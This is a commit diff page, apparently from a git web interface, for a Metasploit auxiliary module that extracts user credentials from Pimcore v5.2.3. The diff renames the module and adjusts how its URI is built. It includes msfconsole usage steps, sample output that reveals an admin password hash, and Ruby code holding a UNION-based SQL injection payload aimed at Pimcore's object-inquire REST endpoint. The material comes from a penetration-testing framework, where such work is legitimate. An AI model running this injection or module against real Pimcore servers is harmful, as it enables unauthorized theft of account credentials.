renamed/relocated files, changed uri
parent
0c842b852b
commit
b6ca8cac7f
|
@ -16,7 +16,7 @@
|
||||||
|
|
||||||
1. Install the application
|
1. Install the application
|
||||||
2. Start msfconsole
|
2. Start msfconsole
|
||||||
3. Do: `use auxiliary/sqli/oracle/pimcore_list_creds`
|
3. Do: `use auxiliary/gather/pimcore_creds_sqli`
|
||||||
4. Do: `set RHOSTS [IP]`
|
4. Do: `set RHOSTS [IP]`
|
||||||
5. Do: `set TARGETURI [URI]`
|
5. Do: `set TARGETURI [URI]`
|
||||||
6. Do: `set APIKEY [KEY]`
|
6. Do: `set APIKEY [KEY]`
|
||||||
|
@ -34,12 +34,12 @@
|
||||||
### Tested on Ubuntu 18.04.1 Running Pimcore v5.2.3
|
### Tested on Ubuntu 18.04.1 Running Pimcore v5.2.3
|
||||||
|
|
||||||
```
|
```
|
||||||
msf5 > use auxiliary/sqli/oracle/pimcore_list_creds
|
msf5 > use auxiliary/gather/pimcore_creds_sqli
|
||||||
msf5 auxiliary(sqli/oracle/pimcore_list_creds) > set rhosts 192.168.37.246
|
msf5 auxiliary(gather/pimcore_creds_sqli) > set rhosts 192.168.37.246
|
||||||
rhosts => 192.168.37.246
|
rhosts => 192.168.37.246
|
||||||
msf5 auxiliary(sqli/oracle/pimcore_list_creds) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b
|
msf5 auxiliary(gather/pimcore_creds_sqli) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b
|
||||||
apikey => 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b
|
apikey => 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b
|
||||||
msf5 auxiliary(sqli/oracle/pimcore_list_creds) > run
|
msf5 auxiliary(gather/pimcore_creds_sqli) > run
|
||||||
|
|
||||||
[+] Credentials obtained:
|
[+] Credentials obtained:
|
||||||
[+] admin : $2y$10$sBaD3EOAm/i1F3Mm/fwseeq3nyoacdlUt4NkVLZUgJ4FTReJSKIbe
|
[+] admin : $2y$10$sBaD3EOAm/i1F3Mm/fwseeq3nyoacdlUt4NkVLZUgJ4FTReJSKIbe
|
|
@ -5,7 +5,6 @@
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Auxiliary::Report
|
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -42,8 +41,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_creds
|
def get_creds
|
||||||
api_uri = "/webservice/rest/object-inquire"
|
api_uri = normalize_uri(target_uri.path, "/webservice/rest/object-inquire")
|
||||||
api_uri = normalize_uri(target_uri.path, api_uri)
|
|
||||||
cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#"
|
cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#"
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
Loading…
Reference in New Issue